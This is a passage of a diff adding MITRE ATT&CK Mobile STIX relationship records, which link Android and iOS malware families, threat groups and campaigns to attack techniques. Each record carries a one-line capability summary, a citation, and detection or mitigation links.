"object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--eca69d9c-7c27-4147-ad7a-a1c30317df1d", + "type": "relationship", + "created": "2019-08-09T18:06:11.672Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-08-09T18:06:11.672Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) can take pictures with both the front and rear-facing cameras.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--910009da-65c0-4e6a-aeb2-386c643d1c0e", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler-SuperMarioRun", + "description": "Viral Gandhi. (2017, January 12). Super Mario Run Malware #2 – DroidJack RAT. Retrieved January 20, 2017.", + "url": "https://www.zscaler.com/blogs/security-research/super-mario-run-malware-2-droidjack-rat" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:24:53.701Z", + "description": "[DroidJack](https://attack.mitre.org/software/S0320) captures SMS data.(Citation: Zscaler-SuperMarioRun)", + "relationship_type": "uses", + "source_ref": "malware--05c4f87c-be8f-46ea-8d9a-2a0aad8f52c1", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--48552acc-5f1a-422f-90fa-37108446f36d", + "created": "2022-03-30T19:14:20.374Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T19:14:20.374Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--039bc59c-ecc7-4997-b2b4-4ab728bd91aa", + "target_ref": "attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--60db521a-ae2d-4a9a-8c6d-47a5528f1ecb", + "type": "relationship", + "created": "2020-01-27T17:05:58.308Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-01-27T17:05:58.308Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) encodes its configurations using a customized algorithm.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0b1e5e78-9ee1-4fc3-9fe7-dc069b59e77d", + "created": "2020-05-04T14:04:56.179Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Google Bread", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Bread](https://attack.mitre.org/software/S0432) payloads have used several commercially available packers.(Citation: Google Bread)", + "modified": "2022-04-15T17:20:54.552Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "target_ref": "attack-pattern--51636761-2e35-44bf-9e56-e337adf97174", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1f8f0021-6992-476c-ba1c-232542dc1633", + "created": "2023-03-20T18:58:52.857Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:58:52.857Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--65803bfa-7601-44ad-95ea-64d8bfd778a4", + "type": "relationship", + "created": "2020-04-08T15:51:25.157Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ThreatFabric Ginp", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020." + } + ], + "modified": "2020-04-08T15:51:25.157Z", + "description": "[Ginp](https://attack.mitre.org/software/S0423) can capture device screenshots and stream them back to the C2.(Citation: ThreatFabric Ginp)", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3616bacc-6f6e-41f2-832c-cdbbae9622f3", + "created": "2020-11-24T17:55:12.830Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos GPlayed", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020.", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:21:42.102Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can read SMS messages.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bba8b056-acbe-4fed-b890-965a446d7a3c", + "created": "2022-04-01T18:45:00.923Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be warned against granting access to accessibility features and device administration services, and to carefully scrutinize applications that request these dangerous permissions. Users should be taught how to boot into safe mode to uninstall malicious applications that may be interfering with the uninstallation process.", + "modified": "2022-04-01T18:45:00.923Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--71490fdb-e271-4a67-b932-5288924b1dae", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "PaloAlto-DualToy", + "description": "Claud Xiao. (2016, September 13). DualToy: New Windows Trojan Sideloads Risky Apps to Android and iOS Devices. Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[DualToy](https://attack.mitre.org/software/S0315) collects the connected iOS device’s information including IMEI, IMSI, ICCID, serial number and phone number.(Citation: PaloAlto-DualToy)", + "relationship_type": "uses", + "source_ref": "malware--507fe748-5e4a-4b45-9e9f-8b1115f4e878", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e87aa0d6-241f-4f72-bdb6-54e8d5584ae2", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "NYTimes-BackDoor", + "description": "Matt Apuzzo and Michael S. Schmidt. (2016, November 15). Secret Back Door in Some U.S. Phones Sent Data to China, Analysts Say. Retrieved February 6, 2017.", + "url": "https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:42:14.121Z", + "description": "[Adups](https://attack.mitre.org/software/S0309) transmitted call logs.(Citation: NYTimes-BackDoor)", + "relationship_type": "uses", + "source_ref": "malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7accde36-cb29-43c6-8c66-6486efd867a8", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "modified": "2019-10-10T15:27:22.157Z", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) contains functionality to gather GPS coordinates.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a5b37f26-7629-4195-9536-12e349e5843b", + "created": "2023-03-20T18:51:04.334Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:51:04.334Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4a67b14a-e489-4e8f-b545-5bdf134e146e", + "type": "relationship", + "created": "2020-04-24T15:06:33.519Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T15:06:33.519Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can collect messages from GSM, WhatsApp, Telegram, Facebook, and Threema by reading the application’s notification content.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3841024e-1047-40fa-9e25-ac6d5c14612a", + "created": "2023-02-28T21:41:22.768Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:25:52.302Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can request permission to view device contacts.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4cb926c1-c242-45c2-be46-07c22435a8a5", + "created": "2022-09-30T19:23:02.689Z", + "revoked": false, + "external_references": [ + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T19:23:02.689Z", + "description": "During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used Android backdoors that would send information and data from a victim's mobile device to the C2 servers.(Citation: Cylance Dust Storm)", + "relationship_type": "uses", + "source_ref": "campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bd889077-d4bd-4475-8e1f-6f507a7bedb9", + "created": "2022-04-01T13:19:41.207Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T13:19:41.207Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9b8b51fb-c380-4516-b109-821f015506d4", + "created": "2023-03-20T15:40:26.994Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:40:26.994Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--61071d73-fcdf-4820-afd0-e3f0983e0a71", + "created": "2019-07-10T15:42:09.606Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:01:46.513Z", + "description": "[Dark Caracal](https://attack.mitre.org/groups/G0070) controls implants using standard HTTP communication.(Citation: Lookout Dark Caracal Jan 2018) ", + "relationship_type": "uses", + "source_ref": "intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--08c81253-975c-4780-8e85-c72bc6a90c88", + "created": "2020-10-29T19:21:23.225Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) can generate revenue by automatically displaying ads.(Citation: WeLiveSecurity AdDisplayAshas)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0c558826-5cea-422e-8e67-83e53c04d409", + "created": "2020-06-26T15:32:25.146Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "CheckPoint Cerberus", + "url": "https://research.checkpoint.com/2020/mobile-as-attack-vector-using-mdm/", + "description": "A. Hazum, B. Melnykov, C. Efrati, D. Golubenko, I. Wernik, L. Kuperman, O. Mana. (2020, April 29). First seen in the wild – Malware uses Corporate MDM as attack vector. Retrieved June 26, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Cerberus](https://attack.mitre.org/software/S0480) communicates with the C2 using HTTP requests over port 8888.(Citation: CheckPoint Cerberus)", + "modified": "2022-04-20T16:37:46.192Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--948a447c-d783-4ba0-8516-a64140fcacd5", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bc4e848a-adb7-40a2-94a1-d5ab9854ff0f", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler-SpyNote", + "description": "Shivang Desai. (2017, January 23). SpyNote RAT posing as Netflix app. Retrieved January 26, 2017.", + "url": "https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app" + } + ], + "modified": "2019-10-10T15:24:09.378Z", + "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) can copy files from the device to the C2 server.(Citation: Zscaler-SpyNote)", + "relationship_type": "uses", + "source_ref": "malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--66c7fdcf-b9ef-429e-81b2-e97e971cfb42", + "type": "relationship", + "created": "2020-11-10T17:08:35.593Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-11-10T17:08:35.593Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) has seen native libraries used in some reported samples (Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cf4243f5-562a-457f-bb15-d45a2047f7ca", + "created": "2019-09-03T19:45:48.510Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:10:15.827Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) Two collects a list of nearby base stations.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--dd818ea5-adf5-41c7-93b5-f3b839a219fb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e05b61a4-ba8a-4aa5-813b-ad76de5945a8", + "type": "relationship", + "created": "2020-09-24T15:34:51.433Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Dendroid", + "description": "Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/03/06/dendroid/" + } + ], + "modified": "2020-09-24T15:34:51.433Z", + "description": "[Dendroid](https://attack.mitre.org/software/S0301) can record audio and outgoing calls.(Citation: Lookout-Dendroid)", + "relationship_type": "uses", + "source_ref": "malware--317a2c10-d489-431e-b6b2-f0251fddc88e", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--09d08f16-9e4d-4279-9a8c-bdda7afdb37d", + "created": "2023-02-06T19:01:08.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:07:32.636Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) has encoded files, such as exploit binaries, to potentially use during and after the rooting process.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d933bba1-61ab-4fea-b7db-7e2a4f4146e7", + "type": "relationship", + "created": "2020-12-14T15:02:35.230Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Securelist Asacub", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020." + } + ], + "modified": "2020-12-14T15:02:35.230Z", + "description": "[Asacub](https://attack.mitre.org/software/S0540) has encrypted C2 communications using Base64-encoded RC4.(Citation: Securelist Asacub)", + "relationship_type": "uses", + "source_ref": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "target_ref": "attack-pattern--e3b936a4-6321-4172-9114-038a866362ec", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4e7a1b10-0f68-4a48-a13d-0c7bc13fb819", + "type": "relationship", + "created": "2019-08-07T15:57:13.412Z", + "created_by_ref": 